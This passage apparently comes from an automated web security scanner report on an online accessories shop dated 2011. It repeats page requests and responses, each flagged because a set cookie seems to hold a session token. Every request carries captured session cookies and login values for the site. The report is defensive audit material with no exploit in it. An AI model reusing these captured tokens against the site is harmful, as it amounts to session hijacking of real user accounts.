GET /stacy-adams-6-027/179064 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:37 GMT Server: Apache Set-Cookie: JSESSIONID=745B49BA9E4A367F133A5B3F923E0F52; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stacy ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /stacy-adams-6-027/179064/403285 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:30 GMT Server: Apache Set-Cookie: JSESSIONID=9CBE70EADFE5BB102771A8D460DFC568; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stacy ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /stacy-adams-6-027/179064/403286 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:28 GMT Server: Apache Set-Cookie: JSESSIONID=4A17CF8555D68050E7519EE6DC059BB5; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stacy ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /stacy-adams-6-027/179064/403287 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:31 GMT Server: Apache Set-Cookie: JSESSIONID=EEA82300E984747BCB349484C472497B; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stacy ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /stacy-adams-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:26 GMT Server: Apache Set-Cookie: JSESSIONID=E3685B02D44BEF9A396A4AAE0BC4A7FB; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>S ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /studded-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:10 GMT Server: Apache Set-Cookie: JSESSIONID=7B9882EDBD233D10010599CE81C842DC; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>S ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sunglasses.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:03:36 GMT Server: Apache Set-Cookie: JSESSIONID=3A1A10605489FA1DE74C6B07F2D78520; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>S ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tamara-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:42 GMT Server: Apache Set-Cookie: JSESSIONID=C22BCF3E07910583DA72D0D429D658B5; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tan-beige-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:38 GMT Server: Apache Set-Cookie: JSESSIONID=6A96D8A3BE984BC3E7629453906CACD0; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tan-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:38 GMT Server: Apache Set-Cookie: JSESSIONID=69E3BE8949BF57B2F58548D27FB06DFF; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /taupe-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:42 GMT Server: Apache Set-Cookie: JSESSIONID=701AC25AC05798AD1A2F1F40AFAEAD8A; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /timberland-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:44 GMT Server: Apache Set-Cookie: JSESSIONID=4A58BDBEBF07AA75CD2FD85B430B6819; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tote-bags.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:02:47 GMT Server: Apache Set-Cookie: JSESSIONID=7F349598575DEB2DF848398E45D87CDD; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tumbled-leather-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:21 GMT Server: Apache Set-Cookie: JSESSIONID=C95F8BDFA24B04773CCB67CEFFC13E66; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /turquoise-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:04 GMT Server: Apache Set-Cookie: JSESSIONID=B04FED6CBA36DFA04C4B2EEFD1609CC9; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /under-$35-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:44 GMT Server: Apache Set-Cookie: JSESSIONID=813DFCC61270B7B182E7B5A758C2CF11; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>U ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /usa-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:57 GMT Server: Apache Set-Cookie: JSESSIONID=C8F9F9856F8BD272341987572817A96D; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>U ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /vintage-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:11 GMT Server: Apache Set-Cookie: JSESSIONID=D5095AB50A30A906ADE9E2F827DF9369; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>V ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /watches.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:01:07 GMT Server: Apache Set-Cookie: JSESSIONID=4C100F9FEF6D08121419D9E17E5D7D91; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
